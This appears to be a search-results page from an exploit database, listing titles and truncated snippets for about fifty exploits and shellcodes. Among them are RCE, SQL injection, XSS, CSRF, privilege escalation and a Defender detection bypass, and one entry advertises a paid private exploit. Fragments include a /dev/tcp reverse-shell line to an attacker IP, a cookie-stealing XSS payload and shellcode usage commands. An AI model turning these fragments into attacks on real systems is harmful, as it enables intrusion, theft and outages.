39001 matches found
AlphaWeb XE - File Upload Remote Code Execution (Authenticated) Exploit
Exploit Title: AlphaWeb XE - File Upload Remote Code Execution RCE Authenticated Exploit Author: Ricardo Ruiz @ricardojoserf Vendor website: https://www.zenitel.com/ Product website: https://wiki.zenitel.com/wiki/AlphaWeb Example: python3 CVE-2021-40845.py -u "http://$ip:80/" -c "whoami" Referenc...
Linux/x86 - Reverse (dynamic IP and port/TCP) Shell (/bin/sh) Shellcode (86 bytes)
Exploit Title: Linux/x86 - Reverse dynamic IP and port/TCP Shell /bin/sh Shellcode 86 bytes Exploit Author: d7x Tested on: Ubuntu x86 / Linux/x86 Reverse TCP Shell with dynamic IP and port binding Shellcode tested on Ubuntu 12.04 LTS Usage: gcc -z execstack -o shellreversetcp shellreversetcp.c $...
HelloWeb 2.0 - Arbitrary File Download Vulnerability
Exploit for asp platform in category web applications Exploit Title: HelloWeb 2.0 - Arbitrary File Download Vendor Homepage: https://helloweb.co.kr/ Version: 2.0 Latest and previous versions Exploit Author: bRpsd Contact Author: cyatlive.no Google Dork: inurl:exec/file/download.asp Type: WebApps ...
Enhanced Multimedia Router 3.0.4.27 Cross Site Request Forgery Vulnerability
Exploit for php platform in category web applications Exploit Title: Enhanced Multimedia Router 3.0.4.27 - Cross-Site Request Forgery Add Admin Exploit Author: Miguel Mendez Z. Vendor Homepage: www.sumavision.com Software Link: http://www.sumavision.com/ensite/i.php?id=29 Version: EMR 3.0.4.27 CV...
Wordpress 5.3 - User Disclosure Exploit
Exploit for php platform in category web applications Exploit Title : Wordpress 5.3 - User Disclosure Author: SajjadBnd Software Link: https://wordpress.org/download/ version : wp ' vuln = url + "/wp-json/wp/v2/users/" while True: try: r = requests.getvuln,verify=False content = json.loadsr.text...
ASUS HM Com Service 1.00.31 - (asHMComSvc) Unquoted Service Path Vulnerability
Exploit Title: ASUS HM Com Service 1.00.31 - 'asHMComSvc' Unquoted Service Path Exploit Author : Olimpia Saucedo Vendor Homepage: www.asus.com Version: 1.00.31 Tested on: Windows 10 Pro x64 but it should works on all windows version The application suffers from an unquoted service path issue...
ThinVNC 1.0b1 - Authentication Bypass Exploit
Exploit Title: ThinVNC 1.0b1 - Authentication Bypass Exploit Author: Nikhith Tumamlapalli Contributor WarMarX Vendor Homepage: https://sourceforge.net/projects/thinvnc/ Software Link: https://sourceforge.net/projects/thinvnc/files/ThinVNC1.0b1/ThinVNC1.0b1.zip/download Version: 1.0b1 Tested on:...
AROX School-ERP Pro - Unauthenticated Remote Command Execution Exploit
This module requires Metasploit: https://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework class MetasploitModule "AROX School-ERP Pro Unauthenticated Remote Code Execution", 'Description' = %q This module exploits a command execution vulnerability in AROX...
Lyric Video Creator 2.1 - (.mp3) Denial of Service Exploit
-- coding: utf-8 -- Exploit Title: Lyric Video Creator 2.1 - '.mp3' Denial of Service PoC Author: Alejandra Sánchez Vendor Homepage: https://lyricvideocreator.com/ Software Link: https://lyricvideocreator.com/dwl/LyricVideoCreator.exe Version: 2.1 Tested on: Windows 10 Proof of Concept: 1.- Run t...
Linux 4.8.0 < 4.8.0-46 - AF_PACKET packet_set_ring Privilege Escalation Exploit
Exploit for linux platform in category local exploits This module requires Metasploit: https://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework class MetasploitModule 'AFPACKET packetsetring Privilege Escalation', 'Description' = %q This module exploits a...
glibc $ORIGIN Expansion Privilege Escalation Exploit
This Metasploit module attempts to gain root privileges on Linux systems by abusing a vulnerability in the GNU C Library glibc dynamic linker. glibc ld.so in versions before 2.11.3, and 2.12.x before 2.12.2 does not properly restrict use of the LDAUDIT environment variable when loading setuid...
Joomla Content History SQL Injection Remote Code Execution Exploit
This Metasploit module exploits a SQL injection vulnerability found in Joomla versions 3.2 up to 3.4.4. The vulnerability exists in the Content History administrator component in the core of Joomla. Triggering the SQL injection makes it possible to retrieve active Super User sessions. The cookie...
SysInfo 1.21 (sysinfo.cgi) Remote Command Execution Exploit
Exploit for cgi platform in category web applications =========================================================== SysInfo 1.21 sysinfo.cgi Remote Command Execution Exploit =========================================================== !/usr/bin/php -q -d shortopentag=on ? echo "sysinfo.cgi 1.21 remo...
Chipmunk Forums SQL Injection Exploit
Exploit for unknown platform in category web applications ===================================== Chipmunk Forums SQL Injection Exploit ===================================== /==========================================/ // GHC - Chipmunk forum - ADVISORY // Product: Chipmunk Forums // URL:...
VICIdial Authenticated Remote Code Execution Exploit
metasploit.com This module requires Metasploit: https://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework class MetasploitModule 'VICIdial Authenticated Remote Code Execution', 'Description' = %q An attacker with authenticated access to VICIdial as an "agent"...
phpfm v1.7.9 - Authentication type juggling Exploit
Exploit Title: phpfm v1.7.9 - Authentication type juggling Exploit Author: thoughtfault Vendor Homepage: https://www.dulldusk.com/phpfm/ Software Link: https://github.com/dulldusk/phpfm/ Version: 1.6.1-1.7.9 Tested on: Ubuntu 22.04 CVE : N/A """ An authentication bypass exists in when the hash of...
WinterCMS < 1.2.3 - Persistent Cross-Site Scripting Vulnerability
Exploit Title: WinterCMS alertdocument.cookie; //Post Request POST /backend/system/settings/update/winter/back...
Revenue Collection System 1.0 SQL Injection / Remote Code Execution Exploit
Revenue Collection System version 1.0 suffers from an unauthenticated SQL injection vulnerability in step1.php that allows remote attackers to write a malicious PHP file to disk. The resulting file can then be accessed within the /rates/admin/DBbackup directory. This script will write the malicio...
VIAVIWEB Wallpaper Admin SQL Injection / Shell Upload Vulnerabilities
Exploit Title: VIAVIWEB Wallpaper Admin - Multiple vulnrabilities Google Dork: intext:"Wallpaper Admin" "LOGIN" "password" "Username" Exploit Author: Edd13Mora Vendor Homepage: www.viaviweb.com Version: N/A Tested on: Windows 11 - Kali Linux ------------------ SQLI on the Login page...
Online Shopping Alphaware 1.0 SQL Injection Vulnerability
Exploit for php platform in category web applications Exploit Title: Online Shopping Alphaware 1.0 - Multiple SQL Injection Vulnerabilty Exploit Author: Edo Maland Vendor Homepage: https://www.sourcecodester.com/php/14368/online-shopping-alphaware-phpmysql.html Software Link:...
QlikView 12.50.20000.0 - (FTP Server Address) Denial of Service Exploit
Exploit Title: QlikView 12.50.20000.0 - 'FTP Server Address' Denial of Service PoC Discovery by: Luis Martinez Vendor Homepage: https://www.qlik.com Software Link: https://www.qlik.com/us/trial/qlik-sense-business Tested Version: 12.50.20000.0 Vulnerability Type: Denial of Service DoS Local Teste...
Centreon 19.10.5 - (Pollers) Remote Command Execution Exploit
Exploit for php platform in category web applications This module requires Metasploit: https://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework class MetasploitModule 'Centreon Poller Authenticated Remote Command Execution', 'Description' = %q TODO , 'Author'...
School ERP System 1.0 - Cross Site Request Forgery (Add Admin) Exploit
Exploit for php platform in category web applications Title: School ERP System 1.0 - Cross Site Request Forgery Add Admin Exploit Author: J3rryBl4nks Vendor Homepage: https://sourceforge.net/projects/school-erp-ultimate/files/ Software Link:...
Windows/x86 - Dynamic Bind Shell + Null-Free Shellcode (571 Bytes)
Shellcode Title: Windows/x86 - Dynamic Bind Shell + Null-Free Shellcode 571 Bytes Shellcode Author: Bobby Cooke Technique: PEB & Export Directory Table Tested On: Windows 10 Pro x86 10.0.18363 Build 18363 Shellcode Function: When executed, this shellcode creates a cmd.exe bind shell, using the...
Freepbx 2.11.1.5 - Remote Code Execution Vulnerability
Exploit for php platform in category web applications Exploit Title: Freepbx coockie recordings injection Google Dork: Ask Santa Date: 23/12/2016 Exploit Author: inj3ctor3 Vendor Homepage: https://www.freepbx.org/ Software Link: ISO LINKS IN SITE https://www.freepbx.org/ Version: ALL && unpatched...
Android Stagefright - Remote Code Execution Exploit
Exploit for Android platform in category remote exploits !/usr/bin/env python Joshua J. Drake @jduck of ZIMPERIUM zLabs Shout outs to our friends at Optiv formerly Accuvant Labs C Joshua J. Drake, ZIMPERIUM Inc, Mobile Threat Protection, 2015 www.zimperium.com Exploit for RCE Vulnerability...
Symantec Endpoint Protection Manager Remote Command Execution Exploit
Symantec Endpoint Protection Manager suffers from a remote command execution vulnerability. Versions 11.0, 12.0, and 12.1 are affected. import argparse import httplib """ Exploit Title: Symantec Endpoint Protection Manager Remote Command Execution Exploit Author: Chris Graham @cgrahamseven CVE:...
linux/x86 whoami shellcode 39 bytes
Exploit for linux/x86 platform in category shellcode =================================== linux/x86 whoami shellcode 39 bytes =================================== / 1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0 0 1 1 /' \ /'\ /\ \ /'\ 0 0 /, \ /\/\ \ \ \ \ ,/\ /\ \ 1 1...
EasyPHP 3.0 Arbitrary Modify Configuration File Vulnerability
Exploit for unknown platform in category local exploits ============================================================= EasyPHP 3.0 Arbitrary Modify Configuration File Vulnerability ============================================================= Bug : Arbitrary Modify Configuration File Vendor :...
Nukedit CMS <= 4.9.6 Unauthorized Admin Add Exploit
Exploit for unknown platform in category web applications =================================================== Nukedit CMS Kapda HTML PoC For Nukedit Kapda HTML PoC For Nukedit Discovered and coded by 3nitro - farhadkey AT kapda dot ir Change the form's action in source :...
GuestBook Script <= 1.7 (include_files) Remote Code Execution Exploit
Exploit for unknown platform in category web applications ===================================================================== GuestBook Script ' . $txt'txtfilenotfound' . ': ' . $val . ''; $tpl-register'guest', $key; ... here is includecontent function: function includecontent$path if isfile$pa...
BSD Passive Connection Shellcode
Exploit for bsd platform in category shellcode ================================ BSD Passive Connection Shellcode ================================ ; Passive Connection Shellcode ; ; Coded by Scrippie - email protected - http://b0f.freebsd.lublin.pl ; Buffer0verfl0w Security ; Why? This evades...
Jasmin Ransomware SQL Injection / Authenticaton Bypass Vulnerability
Exploit Title: Jasmin Ransomware SQL Injection Login Bypass Exploit Author: Buğra Enis Dönmez n3c1 Vendor Homepage: https://github.com/codesiddhant/Jasmin-Ransomware Software Link: https://github.com/codesiddhant/Jasmin-Ransomware Version: N/A Tested on: Windows How to exploit : -- Open Admin Pan...
WordPress WP-Automatic SQL Injection Exploit
This Metasploit module exploits an unauthenticated SQL injection vulnerability in the WordPress wp-automatic plugin versions prior to 3.92.1 to achieve remote code execution. The vulnerability allows the attacker to inject and execute arbitrary SQL commands, which can be used to create a maliciou...
FreePBX 16 - Remote Code Execution (Authenticated) Exploit
Exploit Title: FreePBX 16 - Remote Code Execution RCE Authenticated Exploit Author: Cold z3ro Tested on: 14,15,16 Vendor: https://www.freepbx.org/ %26 /dev/tcp/'.$backconnectip.'/4444 0%261'; curlsetopt$ch, CURLOPTSSLVERIFYHOST, false; curlsetopt$ch, CURLOPTSSLVERIFYPEER, false; echo $response =...
Microsoft Windows Defender Bypass - Detection Mitigation Bypass Vulnerability
Back in 2022, the researcher released a proof of concept to bypass the Backdoor:JS/Relvelshe.A detection in Windows Defender but it no longer works as it was mitigated. However, adding a simple javascript try catch error statement and eval'ing the hex string, it executes as of the time of this...
Campcodes Online Matrimonial Website System v3.3 - Code Execution via malicious SVG file upload
Exploit Title: Online Matrimonial Website System v3.3 - Code Execution via malicious SVG file upload Category: Web Application Exploit Author: Rajdip Dey Sarkar Version: 3.3 Tested on: Windows/Kali CVE: CVE-2023-39115 Description: ---------------- An arbitrary file upload vulnerability in Campcod...
Joomla HikaShop 4.7.4 - Reflected XSS Vulnerability
Exploit Title: Joomla HikaShop 4.7.4 - Reflected XSS Exploit Author: CraCkEr Vendor: Hikari Software Team Vendor Homepage: https://www.hikashop.com/ Software Link: https://demo.hikashop.com/index.php/en/ Joomla Extension Link:...
qubes-mirage-firewall v0.8.3 - Denial Of Service Exploit
Exploit Title: qubes-mirage-firewall v0.8.3 - Denial Of Service DoS Exploit Author: Krzysztof Burghardt Vendor Homepage: https://mirage.io/blog/MSA03 Software Link: https://github.com/mirage/qubes-mirage-firewall/releases Version: = 0.8.0 & 0.8.4 Tested on: Qubes OS CVE: CVE-2022-46770 PoC exploi...
Sysax Multi Server 6.95 - (Password) Denial of Service Exploit
Exploit Title: Sysax Multi Server 6.95 - 'Password' Denial of Service PoC Discovery by: Luis Martinez Vendor Homepage: https://www.sysax.com/ Software Link: https://www.sysax.com/download/sysaxservsetup.msi Tested Version: 6.95 Vulnerability Type: Denial of Service DoS Local Tested on OS: Windows...
MiniDVBLinux 5.4 Change Root Password Vulnerability
MiniDVBLinux 5.4 Change Root Password PoC Vendor: MiniDVBLinux Product web page: https://www.minidvblinux.de Affected version: =5.4 Summary: MiniDVBLinuxTM Distribution MLD. MLD offers a simple way to convert a standard PC into a Multi Media Centre based on the Video Disk Recorder VDR by Klaus...
Support Board 3.3.3 - Multiple SQL Injection (Unauthenticated) Vulnerability
Exploit Title: Support Board 3.3.3 - 'Multiple' SQL Injection Unauthenticated Exploit Author: John Jefferson Li Vendor Homepage: https://board.support/ Software Link: https://codecanyon.net/item/support-board-help-desk-and-chat/20359943 Version: 3.3.3 Tested on: Ubuntu 20.04.2 LTS ----- PoC 1:...
Microsoft Internet Explorer jscript9.dll Memory Corruption Exploit
There is a vulnerability in jscript9 that could be potentially used by an attacker to execute arbitrary code when viewing an attacker-controlled website in Internet Explorer. The vulnerability has been confirmed on Windows 10 64-bit with the latest security patches applied. Internet Explorer:...
AVideo Platform 8.1 - Information Disclosure (User Enumeration) Vulnerability
Exploit for jsp platform in category web applications Exploit Title: AVideo Platform 8.1 - Information Disclosure User Enumeration Exploit Author: Ihsan Sencan Vendor Homepage: https://avideo.com Software Link: https://github.com/WWBN/AVideo Version: 8.1 Tested on: Linux CVE: N/A POC: 1...
ProShow Producer 9.0.3797 - (ScsiAccess) Unquoted Service Path Vulnerability
Exploit Title: ProShow Producer 9.0.3797 - 'ScsiAccess' Unquoted Service Path Exploit Author : ZwX Exploit Date: 2019-11-21 Vendor Homepage : http://www.photodex.com/ Link Software : http://files.photodex.com/release/pspro903797.exe Tested on OS: Windows 7 Analyze PoC : ==============...
Linux/x86_64 - Bind (4444/TCP) Shell (/bin/sh) Shellcode (131 bytes)
;Title: Linux/x8664 - Bind 4444/TCP Shell /bin/sh ;Author: Aron Mihaljevic ;Architecture: Linux x8664 ;Shellcode Length: 131 bytes ;github = https://github.com/STARRBOY ;test shellcode = after you run the shellcode, open another terminal and run "netcat -vv 0.0.0.0 4444" ================== ASSEMB...
Tebilisim Remote File Read Vulnerability
Exploit for php platform in category web applications This is private exploit. You can buy it at https://0day.today...
Easyndexer 1.0 - Cross-Site Request Forgery (Add Admin) Vulnerability
Exploit for php platform in category web applications Exploit Title: Easyndexer 1.0 - Cross-Site Request Forgery Add Admin Exploit Author: Ihsan Sencan Vendor Homepage: https://sourceforge.net/projects/easyndexer/ Software Link:...
Nginx 1.13.10 Accept-Encoding Line Feed Injection Exploit
Exploit for linux platform in category remote exploits // UndergroundAgency UA - koa, bacL, g3kko, Dostoyevsky // trigger nginx 1.13.10 latest logic flaw / bug // 2018 // Tested on Ubuntu 17.10 x86 4.13.0-21-generic include include include include include include include int mainint argc, char ar...
Axis SSI - Remote Command Execution / Read Files Vulnerabilities
Exploit for multiple platform in category remote exploits STX Subject: SSI Remote Execute and Read Files Researcher: bashis August 2016 Release date: October, 2017 Old stuff that I've forgotten, fixed Q3/2016 by Axis Attack Vector: Remote Authentication: Anonymous no credentials needed Conditions...